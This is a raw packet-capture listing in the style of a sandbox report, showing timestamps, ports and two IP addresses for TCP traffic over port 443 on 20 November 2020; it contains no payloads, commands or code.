                                                                                                                                                Nov 20, 2020 11:27:06.983536005 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.983536005 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.983560085 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.983577967 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.983580112 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.983602047 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.983603001 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.983623028 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.983644962 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.983648062 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.983670950 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.983675957 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.983690977 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.983711004 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.983712912 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.983753920 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.993689060 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.993855000 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.993892908 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.993911982 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.993972063 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.993992090 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.995450974 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.995481968 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.995534897 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.995563030 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.010721922 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.010792017 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.010832071 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.010850906 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.010878086 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.010896921 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.010912895 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.010961056 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.010967970 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.011008024 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.011068106 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.011069059 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.011132002 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.011182070 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.011195898 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.011238098 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.011243105 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.011291981 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.011313915 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.011333942 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.011337996 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.011353970 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.011367083 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.011373997 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.011398077 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.011399031 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.011420965 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.011430025 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.011440992 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.011461020 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.011465073 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.011482000 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.011493921 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.011502028 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.011523008 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.011532068 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.011543989 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.011567116 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.011568069 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.011583090 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.011589050 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.011611938 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.011631012 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.011635065 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.011641979 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.011651993 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.011665106 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.011672020 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.011684895 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.011693954 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.011706114 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.011715889 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.011724949 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.011758089 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.011778116 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.011816025 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.011848927 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.011873007 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.011902094 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.011903048 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.011945963 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012003899 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012006998 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.012062073 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012104034 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012113094 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.012168884 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012176037 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.012223959 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012276888 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.012284994 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012322903 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012356997 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012384892 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012411118 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012428999 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012449026 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012465000 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.012470007 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012474060 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.012481928 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.012492895 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.012492895 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012518883 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012527943 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.012540102 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012561083 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012562990 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.012581110 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012593031 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.012603045 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012624979 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012629986 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.012645960 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012654066 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.012667894 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012691021 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012691975 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.012712955 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012726068 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.012732983 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012754917 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012775898 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012785912 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.012797117 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012819052 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012829065 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.012840033 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012864113 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012866974 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.012887001 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012897968 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.012912035 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012924910 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.012933016 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.012980938 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013003111 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013024092 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013024092 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.013031006 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.013035059 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.013044119 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013044119 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.013087034 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013087034 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.013112068 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.013112068 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013137102 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013138056 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.013159037 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.013160944 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013206005 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013216972 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.013231993 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013254881 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013274908 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.013293028 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013297081 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.013318062 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013341904 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013349056 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.013367891 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013372898 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.013380051 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.013395071 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.013427019 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.013431072 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013457060 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013483047 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013503075 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.013509989 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013530016 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.013536930 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013552904 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.013561010 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013586998 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013611078 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.013611078 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013623953 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.013641119 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013667107 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013676882 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.013691902 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013703108 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.013715982 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013735056 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.013741970 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013767958 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013773918 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.013799906 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013809919 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.013824940 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013828993 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.013849974 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013856888 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.013875961 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013876915 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.013901949 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013905048 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.013917923 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.013931990 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013942957 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.013957977 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.013983011 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014007092 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014008999 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014034033 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014038086 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014059067 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014067888 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014084101 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014089108 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014110088 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014113903 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014137983 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014137983 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014158010 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014164925 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014183044 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014190912 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014216900 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014216900 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014240980 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014242887 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014261007 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014269114 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014286995 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014295101 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014318943 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014319897 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014337063 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014348984 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014364958 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014375925 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014400959 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014425993 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014426947 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014447927 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014457941 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014471054 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014484882 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014494896 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014508963 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014518023 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014530897 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014544010 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014554024 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014565945 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014579058 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014588118 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014589071 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014611006 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014619112 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014631987 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014635086 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014652967 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014667988 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014689922 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014710903 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014724970 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014749050 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014770985 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014792919 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014800072 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014812946 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014828920 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014833927 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014857054 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014864922 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014879942 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014904022 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014904022 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014925003 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014934063 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014946938 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014970064 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014971018 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.014991999 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.014996052 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.015019894 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.015024900 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.015039921 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.015049934 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.015064001 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.015070915 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.015095949 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.015116930 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.015192986 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.015216112 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.015239000 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.015268087 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.015301943 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.015305996 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.015312910 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.015317917 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.015336990 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.015357971 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:07.015358925 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.015379906 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:07.015391111 CET49747443192.168.2.4162.159.135.233
